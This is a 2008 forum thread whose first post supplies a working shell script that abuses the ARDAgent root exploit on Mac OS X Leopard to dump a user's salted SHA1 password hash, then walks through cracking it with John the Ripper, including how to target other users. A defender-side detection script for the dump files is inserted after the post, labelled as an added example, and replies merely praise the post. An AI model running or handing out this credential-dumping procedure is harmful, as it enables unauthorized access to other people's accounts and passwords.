  #1 (permalink)  
Old 07-09-2008, 02:06 AM
sam
[Security] Dumping and Bruteforcing Password Hashes on Leopard

From an anonymous contributor, this interesting article:

Dumping and Bruteforcing Password Hashes on Leopard

=============================================
====This is for educational purposes only, do not use maliciously====
=============================================

Like on Tiger, salted SHA1 hashes of the password can be dumped. But there is one catch: the user must have root. This can be done by using the newly found ARDAgent exploit. Attached to this post is a .sh script archived in a zip file. This script WILL NOT work if the ARDAgent exploit has been fixed on the target computer. To run the script, do the following in Terminal (/Applications/Utilities):

cd /path/to/the/folder/containing/the/script/
chmod +x passdump.sh
./passdump.sh

From there, you will see a lot of information, and then a file (named theUserName.hash.txt) will be written to your desktop containing the username of the password that is dumped and the salted SHA1 hash contained with this username. This txt file can be run through a bruteforce application named John the Ripper (http://www.openwall.com/john/). A modified build is needed for detecting this hash correctly. This build is found here:

ftp://ftp.openwall.com/pub/projects/...7.2-macosx.zip

Once you download this, just unzip it, and do the following in Terminal:

cd <Drag the unzipped folder into the window>
cd run
./john --format=salt-sha1 ~/Desktop/theUserName.hash.txt

From there, John the Ripper will bruteforce the password. The time for it to get the password will depend on the size and security of the password. Make sure you replace theUserName in the Terminal commands with the one of the file on your desktop. John should say:
Loaded 1 password hash (Salt SHA1 [salt-sha1])

Once John has gotten your password, it will display it as follows:
thePassword (theUserName)


One thing to note: If you want to dump the password of a user that is not the current user, then change this line in the passdump.sh:

CURRENTUSER=`whoami`

to:

CURRENTUSER="theUserNameToDump"


Remember, this is for educational purposes only, do not use it maliciously.

Here is the script, just put it into a file named passdump.sh:

Code:
#!/bin/sh

echo "\nWelcome."
echo "====================================================================="
echo "====This is for educational purposes only, do not use maliciously===="
echo "====================================================================="
sleep 2
echo "For this to work correctly, the ARDAgent exploit must be enabled."
echo " "
echo "Testing to see if the exploit is enabled..."
echo " "

EXPUSER=`osascript -e 'tell application "ARDAgent" to do shell script "whoami"' 2> /dev/null`

if [ "$EXPUSER" = "root" ]; then
    echo "The exploit is enabled, continuing..\n"

    CURRENTUSER=`whoami`

    if [ "$CURRENTUSER" = "root" ]; then
        echo "Getting password for user 'root' is not allowed."
        echo "Please run this without being root."
        exit 0
    fi

    echo "Getting password for the user $CURRENTUSER\n"

    USERUID=`dscl localhost -read /Search/Users/$CURRENTUSER | grep GeneratedUID | sed s/GeneratedUID:\ //`

    echo "The UID of $CURRENTUSER is $USERUID"

    SALTEDSHA=`sh -c "osascript -e 'tell application \"ARDAgent\" to do shell script \"cat /var/db/shadow/hash/$USERUID | cut -c169-216\"'" 2> /dev/null`

    echo "The salted SHA1 hash is $SALTEDSHA\n"
    echo "$CURRENTUSER:$SALTEDSHA" > ~/Desktop/$CURRENTUSER.hash.txt
    echo "The password was written to ~/Desktop/$CURRENTUSER.hash.txt, which can be run through a modified John the Ripper, found here:"
    echo "ftp://ftp.openwall.com/pub/projects/john/contrib/osx/john-1.7.2-macosx.zip"

else
    echo "The ARDAgent exploit is not enabled, so therefore, this will not work."
    exit 0
fi

Last edited by sam; 07-09-2008 at 02:10 AM.
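
A defender-side check for the artifact the procedure in post #1 leaves behind, as an added example that is not part of the original post or the script's author's code: it flags files shaped like the script's output (one "username:48 hex characters" line in a *.hash.txt file). The function names and the sample values are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag files that look like passdump.sh output. The script in
# post #1 writes one line, "username:<48 hex chars>", to <username>.hash.txt.

# is_hash_dump FILE: succeed if FILE is a single "name:48-hex" record.
is_hash_dump() {
    [ -f "$1" ] || return 1
    [ "$(grep -c '' "$1")" -eq 1 ] || return 1
    grep -Eq '^[^:[:space:]]+:[0-9A-Fa-f]{48}$' "$1"
}

# scan_dir DIR: print "confidence<TAB>user<TAB>path" for every match in DIR.
# "exact" means the file name also equals <user>.hash.txt, as the script
# writes it; "renamed" means only the content matches.
scan_dir() {
    for f in "$1"/*.hash.txt; do
        is_hash_dump "$f" || continue
        user=$(cut -d: -f1 "$f")
        if [ "$(basename "$f")" = "$user.hash.txt" ]; then
            conf=exact
        else
            conf=renamed
        fi
        printf '%s\t%s\t%s\n' "$conf" "$user" "$f"
    done
}

# make_samples DIR: constructed test files (the hex value is made up).
make_samples() {
    hex=0123456789abcdef0123456789abcdef0123456789abcdef    # 48 chars
    echo "alice:$hex"         > "$1/alice.hash.txt"   # as the script writes it
    echo "bob:$hex"           > "$1/old.hash.txt"     # renamed copy
    echo "carol:${hex}00"     > "$1/carol.hash.txt"   # 50 hex chars: no match
    echo "notes about hashes" > "$1/notes.hash.txt"   # unrelated text
}

# With no argument, scan the location the script writes to.
scan_dir "${1:-$HOME/Desktop}"
```

Any account this reports should be treated as having an exposed hash and given a new password.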
  #2 (permalink)  
Old 07-09-2008, 02:23 AM
pater

Interesting…props to whoever made this.

Last edited by pater; 07-09-2008 at 02:32 AM.
  #3 (permalink)  
Old 08-31-2008, 12:10 PM
clint999

Interesting…props to whoever made this.
  #4 (permalink)  
Old 09-04-2008, 01:47 AM
pipo

great post!!! more security threads!!!!